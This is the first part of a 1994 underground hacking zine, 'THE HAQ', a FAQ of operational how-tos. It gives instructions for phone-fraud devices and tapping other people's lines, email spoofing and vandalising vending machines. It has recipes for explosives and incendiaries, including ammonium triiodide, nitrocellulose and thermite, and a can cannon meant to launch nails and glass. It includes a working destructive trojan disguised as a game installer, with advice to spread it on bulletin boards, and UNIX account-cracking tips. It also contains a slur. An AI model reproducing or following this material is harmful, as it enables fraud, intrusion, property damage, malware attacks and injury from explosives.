Jun 13, 1994 19:54 from Belisarius

+---------------+
|    THE HAQ    |
| Edition 2.07  |
|  11 JUN 1994  |
+---------------+

"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=

MatrixMage Publications. 1994 No rights reserved.

This file may be redistributed provided that the file and this notice remain intact. This article may not under any circumstances be resold or redistributed for compensation of any kind. Distribution of THE HACK-FAQ! is encouraged and promoted.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

<*> Edited by <*>

# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and Baltimore 2600 Meetings and other nameless locations.

# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)

A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:

Z Maestro    RA of ISCA Underground>
DINO         RA of Shadow Hack and Crack>
Artimage     RA of SKYNET Underground>

Faunus, Revolution, Miska, Informatik, Matrixx, Amarand, Crypto, Steelyhart, aBBa / PfA, Beelzebub, Redbeard, Squarewave, IO, CyberSorceror, Caustic, Doktor Nil, Skipster, Walrus, CPT Ozone, Abort, Kyoti, Carsenio, Aero, Phrack

AND NOW A WORD FROM YOUR EDITOR:

Throughout history mankind has been afraid of the unknown. Before lightning could be scientifically explained it was blamed on the anger of the gods. This belief in mysticism persisted throughout the ages (and still does today).
Later as man acquired simple herbal and chemical knowledge, these men were revered as mages, users of mystical arts derived from the old gods. But as organized religion (i.e. Christianity especially Roman Catholicism) spread and came to dominate society (became the powers that be), the mage was no longer revered. The mage (who only sought to understand the world around himself and make the world a better place) was persecuted, attacked and driven underground by the church. But driving these mages underground (out of society) did not stop their ideas from spreading or them from continuing to work. The church labeled Copernicus as a heretic and mage and only this century has the Roman Catholic church accepted his principles (heliocentric universe) as fact.

So are 'hackers' the same today. We surf the nets seeking knowledge and information (and hopefully understanding). Information and understanding the meaning and import of the information are the two greatest commodities and bases of power in the world today. These things are easy to disseminate and gather in the electronic world. The matrix (cyberspace/web/net [whichever term you choose]) is able to influence and control information faster and better than ever before. This makes many afraid of the cyberculture (not to mention a deep-seated techno-fear of many people, anything new and technical is bad).

We are a new breed of mage; seeking knowledge, desiring understanding, persecuted by the powers that be. This is why I have started this publication. We are the MatrixMages! Our mission is to learn and to pass on that knowledge.

-=> Belisarius <=-

*********************************************************************

What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world."
--Unknown

That is the attitude of many of the people who, knowingly or not, are members of this hyped/wired/cyber culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. But only if you work to change it.

Remember that information and knowledge are powerful commodities. He who has information cannot be beaten. So above all the most important thing to do in the "Underground" is to gather information. This means that you have to work and put in some effort. You don't get something for nothing! So work hard and together we can change the world!

Keep up with latest editions. (Sorry there haven't been many lately but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences. You use this information at your own risk.

*********************************************************************
CONTENTS
*********************************************************************

Sections

I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail (Fooling UUCP)
III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang (Making Weapons and Explosives)
V. Infection (Virii, Trojans, Worms and other creepy crawlies)
VI. NEWBIES READ THIS (Basic Hacking)
VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking)
IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks)
X.
Finding out what that encrypted info is (Cracking programs) XI. How do I keep my info secure (PGP / Cryptology) XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. Tuning in to what's on the radio waves (Radios and Scanning) Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Zines E. Books F. Files and Papers G. Cataglogs H. PGP Keys ********************************************************************* ===================================================================== I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.) WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 MHz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 MHz crystal. 
It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 MHz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? 
(from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *'s Here are the freqs for a red box: $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freqs for 66 milliseconds! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. 
Cut the head off one end of the phone cord. 2. Strip the coating back about two (2) inches. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a lamer, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the threaded end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ BEIGE BOXING 101 Field Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and fry a phreak" it doesn't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this file to whoever you want, just make sure it all stays together, same title, same byline. Field phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hi-tech revenge, anything you can do from your own phone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your phone cord before the jack, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. 
Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a phone, laptop, anything you can plug in a jack.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on phone poles, where your phone line meets your house, and near payphones. I'll go into detail below, but basically just open any box on a telephone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a phone jack. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just fuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telephone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one phone line. These are the fist sized gray or black boxes that appear where a single phone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their phone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. 
These are the 3 foot high green/gray metal columns that are no wider than a telephone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of phone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig-zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from friends and some social engineering, I learned that inside is where two underground phone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to phone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. 
They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6 x 4, attached to a telephone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 phones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 phones the box connects too). On houses: follow the phone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payphones: follow the phone line up from the phone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little phone jack. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there will be a sw. ap. like those on houses (see above). Payphones are normally pretty secure now though, and you probably won't find any of those. 
Phreaky things you can do: Jesus, do I have to tell you lamers everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hi-tech revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to elite for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something a lot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telephone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two terminals with a paper clip or an alligator clip! His phone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (his #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, E-mail revolution@delphi.com no PGP needed. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I USE/DO ALLIANCE TELECONFERENCING? 
(from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to choose the number of ports for your conference call, and how to dial each participant.. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK? (from Token) Just scroll through your favorite business magazine and look for 800#s. Once you get a VMB system you can look for a box being used and try the default passcodes <0000> , <9999> , etc. Like on the INet, most people are too dumb to change their passwd. If you're lucky you might get the root box (I did, the stupid ass's passwd was <4321>). ===================================================================== II. Fake E-mail (Fooling UUCP) HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)? (from Beelzebub, Doktor Nil w/ Belisarius) 1. Telnet to port 25 of any internet server (eg. telnet site.name.and.address 25) 2. If at all possible, AVOID TYPING "HELO". 3. Type: rcpt to (person to receive fake mail){ENTER} 4. Type: mail from (fake name and address){ENTER} 5. The mail server should ok each time after each name. 6. If it does not: a) type vrfy and then the name of the person b) as a last resort use helo, this will login your computer as having been the source of the mail 7. Retype the commands, it should say ok now. 8. Type: data{ENTER} 9. The first line of the message will be the Subject line 10. Enter your letter 11. To send letter type a "." on an empty line. 12. Then type quit{ENTER} 13. This is traceable by any sysadmin ... 
don't harass people this way. 14. If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway. 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4 so as to make it look more believable and cover any add-ons the mail routine might try 16. Put a realistic mail header in the mail message to throw people off even more. If there are To: and Date: lines then the program probably won't add them on. 17. Also try to telnet to the site where the recipient has his account. This works better if you know how to fool it. ===================================================================== III. Social Engineering (Free sodas, Dumpster Diving, ATMs, Carding) WHAT DOES SALTING VENDING MACHINES DO? When you take concentrated salt water (a high concentration of salt) and squirt it into the change slot (preferably where the dollar bills come in, though some say it doesn't matter), the salt will short circuit the machine and out will pour change and hopefully sodas. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ANOTHER WAY OF GETTING FREE SODAS? This is an easier and actually more reliable way of getting free sodas. It only wprks pn spme machines though, usually Coca-Cola. Anyways, put in your change and as the last coin goes down the slot start rapidly and repeatedly pressing the button of your choice. If everything works well, then you should get two sodas and your change back. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW ARE THE TRACKS OF ATM CARD ARRANGED? The physical layout of the cards are standard. The logical arrangement of the data stored on the magnetic strip varies from institution to institution. There are some generally followed layouts, but not mandatory. There are actually up to three tracks on a card. Track 1: Designed for airline use. 
Contains name and possibly your account number. This is the track that is used when the ATM greets you by name. There is alot of variation in how things are ordered so occasionally you get 'Greetings Q. John Smith' or 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'. This track is also used with the new airline auto check in (PSA, American, etc). Track 2: The main operational track for online use. The first thing on the track is the Primary Account Number (PAN). This is usually pretty standard for all cards. Some additional info might be on the card such as expiration date. One interesting item is the PIN (Personal Identification Number) offset. When an ATM verifies a PIN locally, it usually uses an encryption scheme involving the PAN and a secret KEY. This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got generated). If you want to select your own PIN, they would put the PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on the Natural PIN plus the offset, and you have the selected PIN. The PIN is never in the clear on your card. Knowing the PIN OFFSET will not give you the PIN. This will require the SECRET KEY. Track 3: The "OFF-LINE" ATM track. It contains information such as your daily limit, limit left, last access, account number, and expiration date. The ATM itself could have the ability to write to this track to update information. ===================================================================== IV. The Big Bang (Making Weapons and Explosives) FLASH POWDERS: (from Neurophyre) Materials: Powdered magnesium, powdered potassium nitrate 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium nitrate. 2. Light it with a long fuse cuz its so bright it might screw up your eyes. 
REAL Cherry Bomb Powder 4 parts by weight of potassium perchlorate 1 part by weight of antimony trisulfide 1 part by weight aluminum powder Relatively Safe 3 parts by weight of potassium permanganate 2 parts by weight of aluminum powder *VERY* Shock/Friction/Static/Heat Sensitive! Use only if suicidal or desperate! 4 parts by weight of potassium chlorate 1 part by weight of sulfur 1 part by weight of aluminum powder 1) To use these mixtures, SEPARATELY pulverize each ingredient into a fine powder, the finer it is, the more power you get. Use a mortar and pestle if available, and grind GENTLY. Do not use plastic as this can build a static charge. Remember, do them SEPARATELY. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AMATEUR EXPLOSIVE (Ammonium Triiodide): (from IO) WARNING: This explosive is EXTREMELY shock sensitive when dry, and moderately sensitive when wet!!! AVOID IT when dry! DO NOT store! The purplish iodine vapor this produces during the explosion will stain and corrode! 1) Take a small plastic bucket, add 3-4 inches of household ammonia. This bucket will never be clean again, in all likelihood. Try to get clear (non-pine, non-cloudy) ammonia. Or use an ammonium hydroxide solution from a chemlab. This results in better but more sensitive, and therefore dangerous crystals. 2) Drop in iodine (like you use on scratches) one drop at a time, or, preferably, use crystals of iodine. 3) Let it settle, then pour it through a piece of cloth, discarding the runoff. 4) Squeeze *gently* to get out excess liquid. 5) Mold it onto the thing you want to blow up, stand **way** back. 6) Wait for it to dry, and throw a rock at it. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW TO BUILD A TENNIS BALL CANNON? 1. Get six (6) tin cans. 2. From five of them remove the tops and bottoms. 3. From the last one remove only the top. (this is the last can to make the breach) 4. 
The cans should overlap and be fit together to make a long barrel closed at one end and open at the other. ___________________________________ open --> ()____)_____)_____)_____)_____)_____) <--closed (barrel) 1 2 3 4 5 6 (breach) 5. Duct tape all of the cans together. USE LOTS OF TAPE!! 6. Put some gunpowder in the bottom of the CANnon. 7. Aim, brace the CANnon. 8. Spray hairspray or pour alcohol on the tennis ball and light. 9. Drop the ball into the can and STAND BACK! Other ideas: a) Make explosive tennis balls. b) Launch potatoes. c) Launch thumbtacks, nails, broken glass, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)? (from Terrorist's Handbook) Materials: cotton, concentrated nitric acid, concentrated sulfuric acid, distilled water Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue litmus paper Procedure: 1. Pour 10mL of sulfuric acid into beaker. 2. Pour 10mL of nitric acid into beaker with sulfuric acid. 3. Immediately add 0.5 gram of cotton. 4. Allow it to soak for EXACTLY three(3) minutes. 5. Remove the nitrocellulose. 6. Put the nitrocellulose into a beaker of distilled water to wash it in. 7. Allow the material to dry. 8. Re-wash it. 9. Once neutral(acid/base) it can be dried and stored. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THERMITE AND HOW DO I MAKE IT? Thermite is a powder which burns incredibly hot (approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. 
Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "boot.com" How to use it? This can pose as the installation program for a game. 
This means that when you upload it to a BBS or something, and post
that it is a kickass game, people will download it and try to install
it on their computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and you
CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:

+---------------+
|    THE HAQ    |
| Edition 2.07  |
|  11 JUN 1994  |
+---------------+

File 2 of 3

=====================================================================
VI. NEWBIES READ THIS
(Basic Hacking)

WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards. Even then I wouldn't stake my life on it."
    - originally from Gene Spafford
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
Password Access-   Get rid of simple passwords; routinely change all
                   passwords; regular review/monitoring of password
                   files

Physical Access-   Lock up terminals, personal computers, disks when
                   not in use; eliminate unnecessary access lines;
                   disconnect modems when not in use

Other measures-    Know who you are talking to; shred all documents;
                   avoid public domain software; report suspicious
                   activity (especially non-working hours access)

What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance of
SysOps. The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date. Not only that, but they are
monitoring the hack/phreak BBSes and publications. So the bottom line
is reveal nothing to overinquisitive newbies...they may be working
for the wrong side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN). It provides
controllable filtering of network traffic, allowing restricted access
to certain Internet port numbers and blocks access to pretty well
everything else.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?

1.  Don't do damage intentionally.
2.  Don't alter files other than to hide your presence or to remove
    traces of your intrusion.
3.  Don't leave any real name, handle, or phone number on any system.
4.  Be careful who you share info with.
5.  Don't leave your phone number with anyone you don't know.
6.  Do NOT hack government computers.
7.  Don't use codes unless you HAVE to.
8.  Be paranoid!
9.  Watch what you post on boards, be as general as possible.
10. Ask questions...but do it politely and don't expect to have
    everything handed to you.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO I DO IF I AM GETTING NOWHERE?

1. Change parity, data length, and stop bits. The system may not
   respond to 8N1 (most common setting) but may respond to 7E1, 8E2,
   7S2, etc.
2. Change baud rates.
3. Send a series of carriage returns.
4. Send a hard break followed by a carriage return.
5. Send control characters. Work from ^a to ^z.
6. Change terminal emulation.
7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
   LOGON, JOIN, HELP, or anything else you can think of.

=====================================================================
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)

WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin. These accounts may be unpassworded or
the password may possibly be the same (i.e. username uucp has uucp as
the passwd).
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:

    userid:password:userid#:groupid#:GECOS field:home dir:shell

What each of these fields mean/do---

userid      -=> the userid name, entered at login and is what the
                login searches the file for. Can be a name or a
                number.

password    -=> the password is written here in encrypted form. The
                encryption is one way only. When a login occurs the
                password entered is run through the encryption
                algorithm (along with a salt) and then contrasted to
                the version in the passwd file that exists for the
                login name entered. If they match, then the login is
                allowed. If not, the password is declared invalid.

userid#     -=> a unique number assigned to each user, used for
                permissions

groupid#    -=> similar to userid#, but controls the group the user
                belongs to.
                To see the names of various groups check /etc/group

GECOS FIELD -=> this field is where information about the user is
                stored. Usually in the format full name, office
                number, phone number, home phone. Also a good source
                of info to try and crack a password.

home dir    -=> is the directory where the user goes into the system
